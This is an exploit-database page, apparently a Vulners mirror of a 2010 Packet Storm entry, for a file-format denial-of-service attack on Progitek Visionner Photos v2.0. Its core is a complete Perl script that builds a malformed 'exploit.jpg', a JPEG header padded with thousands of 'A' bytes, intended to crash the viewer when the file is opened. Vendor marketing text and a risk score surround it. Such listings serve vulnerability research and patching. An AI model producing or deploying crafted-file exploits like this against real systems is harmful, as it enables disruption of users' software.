Lucene search
K

Progitek Visionner Photos 2.0 Denial Of Service

🗓️ 04 Aug 2010 00:00:00Reported by antrhacksType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Progitek Visionner Photos v2.0 Denial Of Service via File Forma

Code
`================================================  
Progitek Visionner Photos v2.0 - File Format DOS  
================================================  
  
# Title: Progitek Visionner Photos v2.0 - File Format DOS  
# Author: antrhacks  
# Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html  
# Version: 2.00  
# Platform: Windows XP SP3 Home edition Fr  
# Have to place exploit in %HOMEDRIVE%\Program Files\Progitek\VisioPhotos\ by default  
  
  
#!/usr/bin/perl  
  
  
my $file= "exploit.jpg";  
  
my $junk= "ÿØÿà JFIF" . "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" x 1019;  
  
open($FILE, ">$file");  
  
print($FILE $junk);  
  
close($FILE);  
  
print("[+] Your Exploit was created successfully");  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Aug 2010 00:00Current
7.4High risk
Vulners AI Score7.4
16